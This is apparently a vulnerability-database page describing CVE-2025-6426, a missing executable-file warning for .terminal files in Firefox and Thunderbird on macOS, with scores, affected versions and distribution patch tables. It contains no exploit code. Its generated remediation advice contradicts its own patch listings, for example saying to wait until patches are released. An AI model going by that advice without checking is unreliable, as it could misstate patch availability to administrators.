How to fix CVE-2025-6426?

Within 24 hours: Identify and inventory all macOS Firefox and Thunderbird users in the organization. Within 7 days: Issue a security advisory instructing users to avoid opening files with 'terminal' extensions from untrusted sources and to disable Firefox/Thunderbird if alternative browsers are available. Within 30 days: Deploy Firefox 140+ and Thunderbird 140+ (or ESR 128.12+) across all macOS endpoints once patches are released, or transition users to alternative browsers if patches are delayed.

Is macOS affected by CVE-2025-6426?

Firefox and Thunderbird on macOS contain a vulnerability that disables security warnings when users attempt to open files with the 'terminal' extension, potentially allowing malicious scripts to execute with user privileges.

CVE-2025-6426

EUVD-2025-19102 HIGH

2025-06-24 [email protected]

8.8

CVSS 3.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

Lifecycle Timeline

Patch Released

Mar 31, 2026 - 21:13 nvd

Patch available

Analysis Generated

Mar 15, 2026 - 22:36 vuln.today

EUVD ID Assigned

Mar 15, 2026 - 22:36 euvd

EUVD-2025-19102

CVE Published

Jun 24, 2025 - 13:15 nvd

HIGH 8.8

Description

The executable file warning did not warn users before opening files with the `terminal` extension. *This bug only affects Firefox for macOS. Other versions of Firefox are unaffected.* This vulnerability affects Firefox < 140, Firefox ESR < 128.12, Thunderbird < 140, and Thunderbird < 128.12.

Analysis

CVE-2025-6426 is a missing executable file warning vulnerability in Firefox and Thunderbird on macOS that fails to alert users before opening files with the 'terminal' extension, potentially allowing attackers to execute arbitrary code. This affects Firefox < 140, Firefox ESR < 128.12, Thunderbird < 140, and Thunderbird < 128.12 on macOS only. An attacker can leverage this to trick users into executing malicious terminal scripts by bypassing the security warning mechanism that normally prevents automatic execution of executable files.

Technical Context

The vulnerability stems from improper input validation and security control implementation in the file execution warning system (CWE-345: Insufficient Verification of Data Authenticity). Firefox and Thunderbird on macOS maintain a list of file extensions recognized as executable to trigger user warnings before opening them. The 'terminal' extension was omitted from this safelist, allowing .terminal files (macOS shell script bundles that execute commands) to bypass the executable file warning dialog. This is specific to macOS because .terminal files are a native macOS construct for executing shell scripts. The affected CPE ranges are: mozilla:firefox < 140.0, mozilla:firefox_esr < 128.12, mozilla:thunderbird < 140.0, and mozilla:thunderbird < 128.12. The root cause is incomplete enumeration of dangerous file types in the extension validation logic.

Affected Products

- Mozilla Firefox (< 140.0) - Mozilla Firefox ESR (< 128.12) - Mozilla Thunderbird (< 140.0) - Mozilla Thunderbird (< 128.12 (ESR track))

Priority Score

Low Medium High Critical

KEV: 0

EPSS: +0.0

CVSS: +44

POC: 0

Vendor Status

Ubuntu

Priority: Medium

firefox

Release	Status	Version
jammy	not-affected	code not present
noble	not-affected	code not present
oracular	not-affected	code not present
plucky	not-affected	code not present
upstream	not-affected	debian: MacOS-specific
questing	not-affected	code not present

thunderbird

Release	Status	Version
noble	not-affected	code not present
oracular	not-affected	code not present
plucky	not-affected	code not present
jammy	released	1:128.12.0+build1-0ubuntu0.22.04.1
upstream	released	128.12
questing	not-affected	code not present

mozjs38

Release	Status	Version
bionic	needs-triage	-
jammy	DNE	-
noble	DNE	-
oracular	DNE	-
plucky	DNE	-
upstream	needs-triage	-
questing	DNE	-

mozjs52

Release	Status	Version
bionic	ignored	-
focal	ignored	-
jammy	DNE	-
noble	DNE	-
oracular	DNE	-
plucky	DNE	-
upstream	needs-triage	-
questing	DNE	-

mozjs68

Release	Status	Version
focal	ignored	-
jammy	DNE	-
noble	DNE	-
oracular	DNE	-
plucky	DNE	-
upstream	needs-triage	-
questing	DNE	-

mozjs78

Release	Status	Version
jammy	ignored	-
noble	DNE	-
oracular	DNE	-
plucky	DNE	-
upstream	needs-triage	-
questing	DNE	-

mozjs91

Release	Status	Version
jammy	ignored	-
noble	DNE	-
oracular	DNE	-
plucky	DNE	-
upstream	needs-triage	-
questing	DNE	-

mozjs102

Release	Status	Version
jammy	ignored	-
noble	ignored	-
oracular	DNE	-
plucky	DNE	-
upstream	needs-triage	-
questing	DNE	-

mozjs115

Release	Status	Version
jammy	DNE	-
noble	ignored	-
oracular	ignored	-
plucky	ignored	-
upstream	needs-triage	-
questing	DNE	-

USN-7663-1

Debian

firefox

Release	Status	Fixed Version	Urgency
sid	fixed	148.0.2-1	-
(unstable)	not-affected	-	-

firefox-esr

Release	Status	Fixed Version	Urgency
bullseye	fixed	115.14.0esr-1~deb11u1	-
bullseye (security)	fixed	140.8.0esr-1~deb11u1	-
bookworm	fixed	128.14.0esr-1~deb12u1	-
bookworm (security)	fixed	140.8.0esr-1~deb12u1	-
trixie (security), trixie	fixed	140.8.0esr-1~deb13u1	-
forky, sid	fixed	140.8.0esr-1	-
(unstable)	not-affected	-	-

thunderbird

Release	Status	Fixed Version	Urgency
bullseye	fixed	1:115.12.0-1~deb11u1	-
bullseye (security)	fixed	1:140.8.0esr-1~deb11u1	-
bookworm	fixed	1:140.6.0esr-1~deb12u1	-
bookworm (security)	fixed	1:140.8.0esr-1~deb12u1	-
trixie (security), trixie	fixed	1:140.8.0esr-1~deb13u1	-
forky, sid	fixed	1:140.8.0esr-1	-
(unstable)	not-affected	-	-

CVE-2025-6426 vulnerability details – vuln.today

Back

CVE-2025-6426

CVSS Vector

Lifecycle Timeline

Tags

Description

Analysis

Technical Context

Affected Products

Priority Score

Vendor Status

Ubuntu

Debian

Share

CVE-2025-6426

CVSS Vector

Lifecycle Timeline

Tags

Description

Analysis

Technical Context

Affected Products

Priority Score

Vendor Status

Ubuntu

Debian

Share

External POC / Exploit Code